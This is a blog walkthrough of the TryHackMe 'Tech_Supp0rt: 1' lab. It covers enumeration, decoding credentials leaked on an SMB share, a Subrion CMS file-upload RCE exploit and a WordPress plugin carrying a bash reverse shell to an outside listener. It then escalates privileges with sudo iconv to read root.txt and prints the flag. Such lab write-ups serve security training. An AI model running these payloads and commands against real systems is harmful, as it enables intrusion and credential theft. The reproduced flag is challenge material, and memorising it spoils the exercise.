Tryhackme - Tech_Supp0rt: 1

Tryhackme – Tech_Supp0rt: 1

In this walk through, we will be going through the Tech_Supp0rt: 1 room from Tryhackme. This is a Easy rated room on the platform and the objective is to hack into the scammer’s under-development website to foil their plans. So, let’s get started without any delay.

Tech_Supp0rt: 1

Machine Info:

TitleTech_Supp0rt: 1
IPaddress10.10.112.144
DifficultyEasy
ObjectiveHack into the scammer’s under-development website to foil their plans.

Enumeration:

  • I started off with a regular nmap scan and found 4 ports opened – 22 (SSH), 80 (HTTP), 139 and 445 (SMB).

sudo nmap -sS -sV 10.10.112.144

nmap scan

  • Next, fired gobuster on the web server running on port 80 and found two interesting directories – /test and /wordpress.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.112.144/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.112.144/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/19 11:21:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11321]
/phpinfo.php          (Status: 200) [Size: 94941]
/server-status        (Status: 403) [Size: 278]  
/test                 (Status: 301) [Size: 313] [--> http://10.10.112.144/test/]
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.112.144/wordpress/]
                                                                                                                                       
===============================================================
2023/11/19 11:23:44 Finished
===============================================================

gobuster scan

  • The /test directory had a page with a bunch of pop-ups that are used by the scammers in order to target the victims. This seems like a test page for that.

Scam popups

  • Looking into the /wordpress directory reveals a wordpress installation. Enumerated it throughly but can’t find anything worth it on the front-end.

Wordpress installation

  • Next, used the wp-scan to enumerated some usernames and found a hit for one. – support.

wpscan --url http://10.10.112.144/wordpress/ -e u

Wpscan result

  • I didn’t find anything juicy on the wordpress end. No known exploits for the themes, no vulnerable or misconfigured plugins. So, i started enumerating the SMB shares. Used smbclient and smbmap to list the shares and got a read access in websvr share.

smbclient -L \\10.10.112.144

smbclient list

smbmap -H 10.10.112.144

smbmap list

  • Used SMB null session authentication and downloaded the enter.txt file from the websvr share. In there, got a credentials for a potential Subrion installation. We still had no clue about the wordpress creds to go through that route.

smbclient //10.10.112.144/websvr -N

enter.txt

  • Decoded the password string with Cyberchef which reveals a password – Scam2021

admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk
admin:Scam2021

Decode the admin password

  • I looked online for Subrion and found that it is CMS that is used to build different web apps. I tried to access with /subrion but was unable to to so. Then, i looked into the goals written in enter.txt file where it was written that if we are unable to access the subrion installation with the default path, then we have to do that with panel. Used the below path and got a login panel.

http://10.10.112.144/subrion/panel/

Subrion Admin Panel

  • Logged into the dashboard using our found credentials. As checked the subrion version that is running is 4.2.1.

Subrion Dashboard

  • Checked the version for known exploits and found that the it is vulnerable to Arbitrary file upload RCE.

searchsploit Subrion CMS 4.2.1

searchsploit exploit search

searchsploit -m php/webapps/49876.py

searchsploit exploit search

Initial Access:

  • Used the exploit to get our initial access.

python3 49876.py -u http://10.10.112.144/subrion/panel/ -l admin -p Scam2021

Subrion Exploit

  • Next, looked into the wp-config.php file for potential wordpress creds and got a combo. Bingo!

ls /var/www/html/wordpress

ls /var/www/html/wordpress

cat /var/www/html/wordpress/wp-config.php

MYSQL creds

support:ImAScammerLOL!123!

  • Logged into the wordpress dashboard using the found credentials.

Wordpress dashboard

  • Next, i tried to upload our PHP reverse shell in 404.php file but i encountered an error where i was unable to save the file. So, i took a different route.

404.php

  • I used the below PHP code to develop a malicious WordPress plugin which when activated gives me a reverse connection back to my listener.

<?php

/** 
Plugin Name: WordPress Reverse shell
Author: Your Mom
**/

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.18.1.78/4444 0>&1'")

?>

  • Converted it to a zip file and uploaded it to target.

zip -u revshell.zip revshell.php

zip the payload

Upload revshell.zip

Install revshell.zip

  • Once activated, i got a connection back to my netcat listener. Great!

netccat listener

  • Switched my user to scamsite using the previously found credentials.

switch to scamsite

Privilege Escalation:

  • Next, checked for any sudo misconfiguration using the below command and found that our user can run the iconv binary as root without any password.

sudo -l

sudo -l

  • Used an exploit from GTFObins for iconv binary to read the contents of root.txt file and captured our flag.

GTFObins sudo

scamsite@TechSupport:/tmp$ LFILE=/root/root.txt
LFILE=/root/root.txt
scamsite@TechSupport:/tmp$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"
sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"
851b8233a8c09400ec30651bd1529bf1ed02790b

root flag

Task 1 – Submit Flags

Question 1 – What is the root.txt flag?

Task 1 - Submit Flags

Also Read: Tryhackme – SQLMAP

Conclusion:

Conclusion

So that was Tech_Supp0rt: 1 for you. We started off with a regular nmap scan and found 4 ports opened – 22 (SSH), 80 (HTTP), 139 and 445 (SMB). Next, used gobuster to find some hidden directories and got a directory named wordpress with the respective CMS installed. Along with that, looked into the SMB shares and got a file named enter.txt. The file contains creds for Subrion Admin panel. Used the same to access the subrion dashboard. Further, looked for the known exploits of the installed subrion version and found a RCE exploit. Used that to get the initial access on the server. The wp-config file reveals the the creds used to access the WordPress Dashboard. Moving on, once inside the wordpress dashboard, used a malicious worpdress plugin to get shell access and upgraded it to the scamsite user. At last, escalated our privileges by exploiting a sudo misconfiguration for iconv binary using GTFObins exploit and found the root flag and my favorite underwear that was missing for quite some time now. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top